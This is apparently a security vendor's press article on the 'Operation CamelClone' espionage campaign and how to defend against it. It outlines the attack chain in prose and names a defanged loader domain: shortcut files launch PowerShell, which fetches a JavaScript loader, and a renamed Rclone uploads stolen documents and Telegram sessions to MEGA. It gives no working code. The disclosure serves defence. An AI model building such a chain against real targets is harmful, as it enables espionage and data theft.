Seqrite Labs, the enterprise security research division of Quick Heal Technologies and India’s premier malware analysis facility, has unmasked Operation CamelClone—a meticulously orchestrated cyber espionage campaign targeting government agencies, defence establishments, diplomatic entities, and strategic energy organisations across Algeria, Mongolia, Ukraine, and Kuwait. The operation employs highly targeted spear-phishing emails masquerading as legitimate military correspondence to deliver a sophisticated infection chain that silently exfiltrates sensitive procurement documents, policy drafts, and Telegram session credentials to attacker-controlled MEGA cloud storage, operating with surgical precision and near-perfect stealth.
The campaign unfolds through ZIP archives bearing convincing lures like “Weapons Requirements for Kuwait Air Force” or “Algerian-Ukrainian Proposals for Cooperation.” Victims clicking embedded Windows shortcuts (.lnk files) unwittingly trigger PowerShell commands downloading HOPPINGANT, a JavaScript loader from the innocuous-sounding filebulldogs[.]com. This payload deploys Rclone—a legitimate file synchronisation tool renamed l.exe—methodically configured to harvest .doc, .pdf, .txt files from user Desktops and upload them to anonymous MEGA accounts using consistent XOR encryption and credentials across all regions.
Precision Espionage Bypassing Conventional Defences
What distinguishes CamelClone is its masterful use of living-off-the-land binaries (LOLBins), leveraging trusted Windows utilities like PowerShell and Rclone to evade signature-based antivirus solutions. The malware maintains persistence through Telegram credential theft, granting attackers ongoing diplomatic channel access. Identical TTPs—single XOR key, uniform Rclone configs, shared C2 infrastructure—confirm a single threat actor orchestrating multi-national operations.
Seqrite researchers traced the campaign through telemetry from their 8 million endpoint network, which recorded 265.52 million detections between October 2024 and September 2025 (505 per minute average). The India Cyber Threat Report 2026 positions CamelClone within surging APT activity blending espionage, hacktivism, and extortion.
National Security and DPDP Compliance Implications
For Indian enterprises mirroring these profiles—defence contractors, PSUs, diplomatic missions—the breach calculus extends beyond data loss. Exfiltration triggers Digital Personal Data Protection Act 2023 obligations: mandatory breach notification within 72 hours, accountability demonstrations, and potential ₹250 crore penalties for safeguard failures.
Seqrite CISO Vipul Saini warned: “CamelClone exemplifies state-aligned threats demanding behavioural detection beyond signatures. Cognitive intrusions assume breach inevitability—organisations must hunt proactively.”
Comprehensive Defensive Blueprint
Immediate hardening mandates PowerShell Module/Script Block Logging, Rclone application whitelisting, MEGA domain egress blocking, and Telegram enterprise MFA. Seqrite XDR delivers unified visibility for lateral movement hunting across endpoints, networks, cloud.
Regular phishing simulations, removable media controls, and zero-trust segmentation form layered defence. Enterprises should audit for similar TTPs immediately, prioritising C-suite and procurement systems.
Seqrite’s public disclosure empowers global preemption against this persistent adversary.
